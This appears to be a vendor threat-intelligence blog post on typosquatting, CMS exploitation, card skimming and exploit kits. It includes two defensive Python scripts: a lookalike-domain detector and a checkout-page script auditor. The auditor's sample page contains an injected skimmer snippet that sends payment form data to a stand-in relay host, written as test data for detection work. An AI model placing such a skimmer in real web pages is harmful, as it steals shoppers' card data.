New threat alerts appear every day, and adversaries exploit current events to disrupt organizations and governments. Within a few months of the pandemic's start, more than 30,000 COVID-19 themed typosquatting domains were registered, with the potential for many of them to be used in phishing and malware campaigns. More recently, after the large-scale shift to working from home, we began seeing malware such as Emotet delivered through phishing emails with return-to-work themed lures.
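The typosquatting and theme-lure domains described above are something a security team can hunt for in its own newly-registered-domain (NRD) feed. The following script is an added example, not code from the original post or from Fidelis: it normalizes each domain's registrable label (mapping common homoglyphs such as `0`/`1` back to letters), flags labels that contain a current-events keyword, and flags labels that contain or sit within one edit (insert, delete, substitute or adjacent transposition) of a watched brand. The feed lines, the brand watchlist and the keyword list are all constructed for the example.

```python
"""Flag newly registered domains that look like typosquats or current-events lures.

Added example; the feed, watchlist and keywords below are constructed, not real data.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of an NRD feed: "date,domain" per line.
SAMPLE_NRD_FEED = """\
2020-03-18,covid19-relief-funds.com
2020-03-18,paypa1-secure-login.net
2020-03-19,micros0ft-teams-update.com
2020-03-19,example-bakery.org
2020-03-20,coronavirus-map.info
2020-03-20,gooogle.com
"""

# Hypothetical watchlist of brands the organization cares about.
BRAND_WATCHLIST = ["paypal", "microsoft", "google", "fidelis"]
# Hypothetical list of current-events themes worth flagging.
THEME_KEYWORDS = ["covid", "coronavirus", "vaccine", "returntowork"]

# Homoglyph substitutions commonly used in lookalike domains, mapped back to letters.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "@": "a", "$": "s"})


@dataclass
class Finding:
    domain: str
    reason: str   # theme-keyword | brand-containment | brand-lookalike
    matched: str  # the keyword or brand that triggered the finding


def registrable_label(domain: str) -> str:
    """Naive second-level label: drops only the last label (no public-suffix list)."""
    parts = domain.lower().strip().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def squash(label: str) -> str:
    """Keep only [a-z0-9] so hyphens and dots cannot be used to dodge matching."""
    return re.sub(r"[^a-z0-9]", "", label)


def damerau_levenshtein(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute, adjacent transpose."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def check_domain(domain: str) -> Optional[Finding]:
    label = registrable_label(domain)
    raw = squash(label)                      # digits kept, e.g. "covid19"
    norm = squash(label.translate(HOMOGLYPHS))  # homoglyphs folded, e.g. "paypal"

    # Theme lure: keyword anywhere in the label, before or after homoglyph folding.
    for kw in THEME_KEYWORDS:
        if kw in raw or kw in norm:
            return Finding(domain, "theme-keyword", kw)

    # Brand abuse: the brand embedded in a longer label ("paypal-secure-login"),
    # or a token / the whole label within edit distance 1 of the brand ("gooogle").
    # An exact match is the brand's own domain and is not flagged.
    tokens = [squash(t.translate(HOMOGLYPHS)) for t in label.split("-")] + [norm]
    for brand in BRAND_WATCHLIST:
        for tok in tokens:
            if not tok or tok == brand:
                continue
            if brand in tok:
                return Finding(domain, "brand-containment", brand)
            if damerau_levenshtein(tok, brand) <= 1:
                return Finding(domain, "brand-lookalike", brand)
    return None


def scan_feed(feed: str) -> List[Finding]:
    findings = []
    for line in feed.splitlines():
        if not line.strip():
            continue
        _date, domain = line.split(",", 1)
        f = check_domain(domain)
        if f:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan_feed(SAMPLE_NRD_FEED):
        print(f"{f.domain:32} {f.reason:18} {f.matched}")
```

The edit-distance threshold of 1 keeps false positives low on short labels; for long brand names a threshold of 2 is reasonable, and a real deployment should replace the naive second-level-label split with a public-suffix list so that `paypal.co.uk`-style domains are handled correctly.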
Be aware of worldwide threats and current events
Cybercrime threatens the stability of organizations and governments. In critical business verticals such as healthcare, transportation, retail and government, a single threat event can cause short-term disruptions to supply chains, public services and safety, and consumer retail operations. Ransomware activity will persist. We saw it in July 2020 when notable companies such as Blackbaud and Garmin paid ransom demands to the perpetrators. Unfortunately, payouts like these may give ransomware operators a boost in their activities.
For months, Fidelis's Threat Research Team (TRT) has been monitoring and collecting information on external threats that may pose risks to organizations. Our collection and analysis efforts are driven by criticality, timeliness and relevance, and we frequently identify emerging vulnerabilities and malware patterns before they receive broad industry coverage. Below are a few of the recent threat activities we have assessed as posing a risk to companies. Stay tuned and read more on what we've found!
Vulnerabilities in Content Management System Providers
Sites built on content management systems (CMS) such as WordPress, Joomla and Drupal are constantly exploited through vulnerable plugins to upload malicious code, including the landing and redirect pages used by exploit kits. Keeping the CMS core and every installed plugin patched, and removing plugins that are no longer needed, is the most effective protection against these campaigns. Our TRT analysts have previously prioritized and reported on high-risk vulnerabilities in popular plugins and platforms.
North Korea's state-sponsored Lazarus Group (aka Hidden Cobra) was reported to be behind a credit card skimming campaign. The malicious code (the card skimmer) was installed on retailers' online payment pages, and the stolen payment data was then funneled through proxy websites. Many of these proxies were observed to be compromised WordPress content management system (CMS) sites being used to redistribute the stolen data.
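A skimmer of the kind described above has to get the card data off the checkout page somehow, and that usually means a script the shop never intended to load, or an inline script talking to a host the shop has no relationship with. The audit below is an added example (not code from the original post or from Fidelis) that a retailer could run against its own checkout HTML: it lists every external `<script src>` and flags hosts outside an allowlist, reports allowlisted scripts that carry no Subresource Integrity hash, and scans inline scripts for URLs pointing at unknown hosts. The allowlist, the page and the hostnames (`shop.example`, `js.payment-processor.example`, `blog.compromised-wp-site.example`) are all constructed for the example.

```python
"""Audit a checkout page for script sources that could be a card skimmer or exfil relay.

Added example; the allowlist and the sample page below are constructed, not real data.
"""
import re
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urlparse

# Hypothetical allowlist: the shop's own origins plus its payment processor.
ALLOWED_HOSTS = {"shop.example", "cdn.shop.example", "js.payment-processor.example"}

# Constructed checkout page: one first-party script with an SRI hash (placeholder digest),
# one payment-processor script without SRI, one unexpected third-party script, and an
# injected inline script that beacons the serialized payment form to an unrelated
# WordPress site acting as a relay.
SAMPLE_CHECKOUT_HTML = """
<html><body>
<script src="https://cdn.shop.example/checkout.js" integrity="sha384-placeholder"></script>
<script src="https://js.payment-processor.example/v3/"></script>
<script src="https://static.thirdparty-analytics.example/track.js"></script>
<form id="payment"> ... </form>
<script>
document.getElementById('payment').addEventListener('submit', function () {
  var d = JSON.stringify(Object.fromEntries(new FormData(this)));
  new Image().src = 'https://blog.compromised-wp-site.example/wp-content/uploads/x.php?q=' + btoa(d);
});
</script>
</body></html>
"""

URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s'\"<>]*)?")


class ScriptCollector(HTMLParser):
    """Collect external script sources (with SRI flag) and inline script bodies."""

    def __init__(self) -> None:
        super().__init__()
        self.external: List[Tuple[str, bool]] = []  # (src, has_integrity)
        self.inline: List[str] = []
        self._buf: List[str] = []
        self._in_inline = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], "integrity" in a))
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> content as raw data (CDATA mode);
        # buffer it so a body split across chunks is scanned as one string.
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._in_inline = False


def audit_checkout_page(html: str, allowed_hosts=ALLOWED_HOSTS) -> List[str]:
    p = ScriptCollector()
    p.feed(html)
    p.close()
    findings: List[str] = []
    for src, has_sri in p.external:
        host = urlparse(src).hostname or ""
        if host not in allowed_hosts:
            findings.append(f"unexpected external script: {src}")
        elif not has_sri:
            findings.append(f"external script without SRI: {src}")
    for body in p.inline:
        for url in URL_RE.findall(body):
            host = urlparse(url).hostname or ""
            if host not in allowed_hosts:
                findings.append(f"inline script references unknown host: {host}")
    return findings


if __name__ == "__main__":
    for line in audit_checkout_page(SAMPLE_CHECKOUT_HTML):
        print(line)
```

Run it against a fresh fetch of the live checkout page on a schedule and diff the output against the last known-good run; a new external host or a new URL inside an inline script is exactly the signal a skimmer injection produces. The SRI finding is informational: many payment processors update their script in place and cannot be pinned, but a first-party script without a hash is worth fixing.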
Emerging Vulnerabilities in Popular Software and Services
In our Monthly Threat Intelligence Summary, Fidelis' TRT provides customers and external readers with a prioritized list of Trending and Emerging vulnerabilities assessed as high-risk across multiple business verticals. TRT also emphasizes keeping watch over older vulnerabilities in popular software from several years ago that continue to be exploited today by malware campaigns and adversaries, through reports detailing vulnerability trends and current exploit kit activity. Below is a snapshot of the list of Trending vulnerabilities that our TRT analysts have observed being widely exploited and leveraged in malware and cyber-criminal campaigns.
In addition to the Trending Vulnerabilities list, our TRT Intelligence team applies qualitative, properly assessed intelligence forecasting to produce a list of Emerging Vulnerabilities. These vulnerabilities may not be as widely covered by media reporting, nor exploited as actively as those on the Trending list, but our TRT assesses them as emerging threats that could pose significant risk in the near to medium term. For the full Emerging Vulnerabilities lists, visit our resources website to download the latest Fidelis TRT Monthly Threat Intelligence Summary.
Increased Activity from Exploit Kits
Over the last 12 months we have observed a steady level of exploit kit activity. While we agree with the standing assessment that exploit kits have yet to come close to their 2016 and 2017 peak, we believe they remain a relevant, yet under-reported, threat to individual users and enterprises. Older exploit kits such as RIG, Magnitude and Fallout were updated with new modules and capabilities, and new kits surfaced sporadically in campaigns throughout 2019 and 2020.
For example, on 9 July 2020, researchers analyzed a Capesand Exploit Kit (EK) campaign delivering the njRAT malware upon successful exploitation. Capesand EK was observed again on 27 July delivering RaccoonStealer. On 14 July, external researchers identified a sample of Underminer EK delivering an unspecified Trojan using fantasy-sports gambling themed malvertising.
One way to reduce the risk from exploit kits is to stop using Internet Explorer, which is heavily targeted in exploit kit campaigns. You should also ensure browsers and browser plugins are patched and updated regularly: exploit kits rely on known, already-patched vulnerabilities in exactly those components, so an up-to-date browser removes most of their leverage.
Espionage Intent Against Biotech and Pharmaceutical Organizations
How can you stay prepared against your company’s known and unknown threat actors?
The Fidelis Threat Research Team has been publishing monthly Threat Intelligence reports. These reports provide a roundup of the latest and emerging threats, breaches, malware, exploit kits and adverse nation-state activities. Our purpose in creating these reports is to provide you (whether or not you're a Fidelis customer) with information on external threats which may pose a risk to your organization.
We compiled our recent Threat Intelligence Reports into a Threat Intelligence Toolkit to help security professionals like you in the continued fight against cyber adversaries. It's imperative that you be aware of and prepared for the threat actors aiming to disrupt your business. Download our toolkit to stay in the loop on the latest threat intelligence!